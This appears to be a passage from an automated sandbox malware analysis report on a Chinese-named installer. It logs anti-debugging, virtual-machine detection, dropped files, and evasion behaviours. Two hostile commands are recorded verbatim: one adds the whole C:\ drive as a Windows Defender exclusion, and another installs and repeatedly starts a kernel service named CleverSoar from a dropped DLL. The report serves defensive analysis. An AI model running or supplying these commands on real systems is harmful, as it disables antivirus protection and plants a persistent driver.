Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5481Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4352Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 599Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 605Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpWindow / User API: threadDelayed 535Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-HSQ4G.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5R3K0.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-LMQ7E.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C68AEC0 FindFirstFileA,FindClose,FindClose,7_2_6C68AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00826868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00826868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00827496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00827496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00829C60 GetSystemInfo,11_2_00829C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.1526950336.0000000000A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000002.1526950336.0000000000A38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C513886 NtSetInformationThread 00000000,00000011,00000000,000000007_2_6C513886
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6A0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C6A0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_008A57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,11_2_008A57D0
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6A9D66 mov eax, dword ptr fs:[00000030h]7_2_6C6A9D66
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6A9D35 mov eax, dword ptr fs:[00000030h]7_2_6C6A9D35
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C69F17D mov eax, dword ptr fs:[00000030h]7_2_6C69F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C698CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6C698CBD
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C6A0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6C6A0181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.13.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmpCode function: 7_2_6C767720 cpuid 7_2_6C767720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
